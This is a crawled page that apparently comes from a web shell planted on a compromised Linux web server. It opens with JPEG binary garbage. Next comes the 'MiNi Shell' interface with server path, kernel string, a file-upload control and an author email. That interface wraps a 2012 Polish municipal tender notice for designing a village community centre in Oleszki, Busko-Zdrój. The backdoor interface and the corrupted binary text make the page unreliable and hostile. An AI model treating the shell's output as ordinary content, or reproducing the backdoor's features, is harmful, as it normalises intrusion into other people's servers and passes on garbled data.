JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/39339-N-2012.html

<p class="kh_header"><b>Busko-Zdrój: Wykonanie projektu świetlicy wiejskiej w Oleszkach gm. Busko-Zdrój na działce nr 96 w ramach zadania pn. Budowa świetlicy wiejskiej w Oleszkach</b><br>
<b>Numer ogłoszenia: 39339 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu świetlicy wiejskiej w Oleszkach gm. Busko-Zdrój na działce nr 96 w ramach zadania pn. Budowa świetlicy wiejskiej w Oleszkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na:
1.1.Wykonaniu dokumentacji architektoniczno-budowlanej budynku świetlicy wiejskiej 
      w Oleszkach dz. nr ewid. 96.

1.2. Wykonaniu projektu wykonawczego uszczegóławiającego projekt budowlany celem 	realizacji zadania przez Wykonawcę robót,
1.3.  Opracowaniu przedmiaru robót i kosztorysu inwestorskiego - dla  w/w zadania,
1.4. Opracowaniu specyfikacji technicznej ogólnej wykonania i odbioru robót - dla w/w zadania.

2. Dokumentacja projektowa powinna uwzględniać następujące wytyczne Zamawiającego:
2.1 Program funkcjonalno-użytkowy, uwzględniający jedną salę świetlicową, jedną salę komputerową, zaplecze kuchenne dla potrzeb Koła Gospodyń Wiejskich, niezbędne pomieszczenia towarzyszące tj. toalety, magazyn, kotłownię itp.
Projekt winien uwzględniać rozmieszczenie wszystkich pomieszczeń na jednej kondygnacji (budynek parterowy), bez podpiwniczenia, bez użytkowego poddasza.
Budynek w technologii tradycyjnej murowanej.
Budynek pełnić będzie funkcję użyteczności publicznej tj. świetlicy wiejskiej we wsi Oleszki gm. Busko-Zdrój, który będzie stanowił ośrodek rozwoju wsi, będzie miejscem spotkań mieszkańców sołectwa, miejscem kultywowania tradycji regionalnych, regionalną izbą pamięci historycznej, miejscem spotkań organizowanych przez Koło Gospodyń Wiejskich oraz miejscem spotkań gości, dzieci i młodzieży szkolnej. 
2.2. projekt wszystkich niezbędnych urządzeń oraz instalacji wewnętrznych w budynku,
2.3. projekt ogrzewania gazowego na gaz Propan-Butan ze zbiornikiem zewnętrznym 
i przyłączem gazowym od zbiornika do budynku,
2.4. opracowanie projektów:
a) zagospodarowania terenu wraz ze zjazdem z działki, dojściami, dojazdami, ogrodzeniem oraz niezbędnymi urządzeniami technicznymi i ukształtowaniem terenu w celu odprowadzenia wód opadowych. W projekcie zagospodarowania terenu należy przewidzieć 
i wskazać miejsce na usytuowanie altany (będącej w posiadaniu mieszkańców wsi), grilla, boiska oraz placu zabaw dla dzieci. Zaprojektowanie tych elementów (altana, grill, boisko, plac zabaw dla dzieci) nie jest w zakresie przedmiotu opracowania.   
b) dojść i dojazdów do budynku oraz elementów zagospodarowania terenu, 
c) miejsc parkingowych dla przyjezdnych gości (max 10 miejsc),
 d) przyłączy: wodociągowego, elektrycznego, kanalizacyjnego od zbiornika na nieczystości ciekłe do budynku,
e) szczelnego zbiornika na nieczystości (szambo),
f) przebudowy (przełożenia) ewentualnych kolizji istniejącego uzbrojenia podziemnego
  i nadziemnego z projektowaną infrastrukturą
2.5. kompleksowe wyposażenie budynku w urządzenia techniczne i instalacyjne oraz wyposażenie biurowe, sportowe i audio video wg danych Zamawiającego, przekazanych po wytypowaniu Wykonawcy oraz wyposażenie obiektu w elementy małej architektury tj. ławki, kosze na śmieci.
2.6. opracowanie dokumentacji geotechnicznej terenu.

UWAGA!
Zamawiający dopuszcza wykonanie adaptacji typowego projektu z uwzględnieniem programu funcjonalno-użytkowego opisanego powyżej. 

3.	Postanowienia formalne i prawne dotyczące dokumentacji projektowo-  kosztorysowej:
      Wymagania formalne i prawne:
Dokumentacja budowlano-wykonawcza musi być opracowana w sposób zgodny z :
3.1	.Ustawą z dnia 7 lipca 1994r. Prawo Budowlane (tekst. jedn. Dz. U. Nr 207, poz. 2016 z 	2003r. z późn. zmianami),
3.2	.Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie          	szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 z 2003 r. poz. 1133       	z późn. zmianami),
3.3	.Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie 	szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych 	wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego 
    	(Dz. U. Nr 202 z 2004 r. poz. 2072 z późn. zmianami),
3.4	.Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia 	metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych 	kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych   
   w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. 	zmianami).
3.5	.Wytycznymi zawartymi w innych tematycznych przepisach szczegółowych i Polskich 	Normach oraz zgodnie z zasadami wiedzy techniczno-budowlanej.
4.	Zakres usług projektowych powinien obejmować:
4.1. opracowanie projektów przebudowy (przełożenia) ewentualnych kolizji istniejącego  	uzbrojenia podziemnego i nadziemnego z projektowaną infrastrukturą, 
4.2.	uzyskanie wszystkich uzgodnień, opinii i pozwoleń wymaganych przepisami  szczególnymi, w tym również uzgodnień branżowych,
4.3. uzyskanie wszystkich decyzji, uzgodnień, opinii itp., niezbędnych dla zatwierdzenia dokumentacji oraz możliwości:
	- zgłoszenia robót właściwemu organowi - roboty nie wymagające uzyskania 			  pozwolenia na budowę,
	- wydania pozwolenia na budowę przez Starostwo Powiatowe w Busku-Zdroju -  		 roboty które wymagają uzyskania takiego pozwolenia, 
4.4.przygotowanie kompletnego wniosku (wraz z załącznikami) niezbędnego do uzyskania 	przez Zamawiającego decyzji o Środowiskowych Uwarunkowaniach, w przypadku 	konieczności jej uzyskania,
4.5. przygotowanie kompletnego wniosku (wraz z załącznikami) niezbędnego do uzyskania 	przez Zamawiającego decyzji o lokalizacji inwestycji celu publicznego,
4.5.wykonanie kompletnego projektu budowlano-wykonawczego w 5 egzemplarzach + 	wersja elektroniczna dokumentacji do zamieszczenia na stronie internetowej UMiG 	Busko-Zdrój, w wersji papierowej oraz w formie cyfrowej na nośnikach 	elektronicznych (rysunki w formacie DWG i w formacie PDF, teksy w doc. i w 	formacie PDF tj. do zamieszczenia na stronie internetowej UMiG Busko-Zdrój, 
4.6. opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych (w 	jednym egzemplarzu + wersja elektroniczna- doc, PDF),
4.7.	opracowanie przedmiaru robót wraz z zestawieniem materiałów - 1 egzemplarz w 	formie papierowej + wersja elektroniczna (w formacie ATH, KST, PDF lub w programie 	WINBUD). Przedmiar robót należy wykonać zgodnie z obowiązującymi przepisami - 	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w 	sprawie określenia 	metod i podstaw sporządzania kosztorysu inwestorskiego, 	obliczania planowanych 	kosztów prac projektowych oraz planowanych kosztów robót budowlanych 	określonych 	w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 	2004 r. poz. 	1389 	z 	późn. zmianami). Przedmiar robót powinien zawierać 	zestawienie 	przewidywanych do 	wykonania robót podstawowych w kolejności 	technologicznej ich wykonania wraz z 	ich szczegółowym opisem lub wskazaniem 	podstaw ustalających szczegółowy opis 	oraz wskazaniem właściwych specyfikacji 	technicznych wykonania i odbioru robót 	budowlanych, z wyliczeniem i 	zestawieniem ilości jednostek przedmiarowych robót 	podstawowych. 
4.8. opracowanie kosztorysu inwestorskiego - 1 egzemplarz w formie papierowej + wersja elektroniczna (w formacie ATH, KST, PDF lub w programie WINBUD). Kosztorys inwestorski zostanie wykonany zgodnie z obowiązującymi przepisami - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. zmianami). 
4.9. opracowanie informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia

Wszystkie dokumenty występujące w oryginale należy umieścić w egzemplarzu nr 1.

5.	W cenie wykonania dokumentacji należy uwzględnić koszty związane z nadzorem 	autorskim w czasie realizacji inwestycji w ilości ok. 6 wizyt na budowie - na pisemne 	wezwanie Inwestora.
6. Projektant ponosi pełną odpowiedzialność za wady i błędy projektowe ujawnione w 	okresie procedur administracyjnych, jak również ujawnione w toku wdrażania do 	realizacji przedmiotu umowy.
		Projektant odpowiada również za wady i błędy w przedmiarze robót, ujawnione 		podczas trwania procedury przetargowej na roboty budowlane, a w przypadku ich 		stwierdzenia, zobowiązuje się w wyznaczonym przez Zamawiającego terminie do 		wprowadzenia odpowiednich poprawek lub uzupełnień, bez dodatkowego wynagrodzenia.
	Projektant zobowiązuje się w wyznaczonym przez Zamawiającego terminie do udzielania wyczerpujących wyjaśnień na zadawane pytania przez Oferentów w trakcie trwania  procedury przetargowej na roboty budowlane, bez dodatkowego wynagrodzenia.
7. Wykonawca projektu sprawować będzie nadzór autorski (bez dodatkowego 			 wynagrodzenia) w zakresie obejmującym w  szczególności:
  			a) wyjaśnienia Inwestorowi i Wykonawcy robót wątpliwości dotyczących projektu 			budowlano-wykonawczego i zawartych w nim rozwiązań oraz ewentualne 				uzupełnienia szczegółów dokumentacji projektowej w trakcie realizacji zadania wg 			projektu będącego przedmiotem zamówienia.
					b) uzgodnienie z Zamawiającym i Wykonawcą robót budowlanych możliwości 			wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji 		projektowej w odniesieniu do materiałów oraz rozwiązań konstrukcyjnych i 			technologicznych.
8.  Wszelkie prace projektowe lub czynności nieopisane wyżej a wynikające z procedur 		określonych w przepisach szczególnych, niezbędne do właściwego i kompleksowego 	opracowania dokumentacji projektowej, należy traktować jako oczywiste i 			uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.
9.Do obowiązków Projektanta należy zaopatrzenie dzieła w pisemne oświadczenie, że 	dostarczona dokumentacja jest wykonana zgodnie z umową, obowiązującymi 	przepisami techniczno- budowlanymi i normami oraz, że jest kompletna z punktu 		widzenia celu, któremu ma służyć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 
3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
- co najmniej 2 usług odpowiadających lub przybliżonych przedmiotowi niniejszego zamówienia, tj. np. wykonanie kompleksowego projektu budowlano-wykonawczego na budowę obiektu użyteczności publicznej (branża budowlana i instalacyjna) wraz z zagospodarowaniem terenu
z podaniem przedmiotu zamówienia, podmiotu zlecającego prace, daty wykonania oraz załączeniem dokumentu wystawionego przez Zleceniodawcę potwierdzającego, że usługa ta została wykonana należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2.  Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano  
     wyboru Wykonawcy może nastąpić w przypadku:
a)	wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy;
b)	wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy ( termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści Oferty,    
     na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a)	opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. termin uzyskania wszelkich opinii, uzgodnień oraz decyzji administracyjnych. Termin ten zostaje wówczas przedłużony o czas otrzymania w/w dokumentów.
b)	wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do realizacji zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com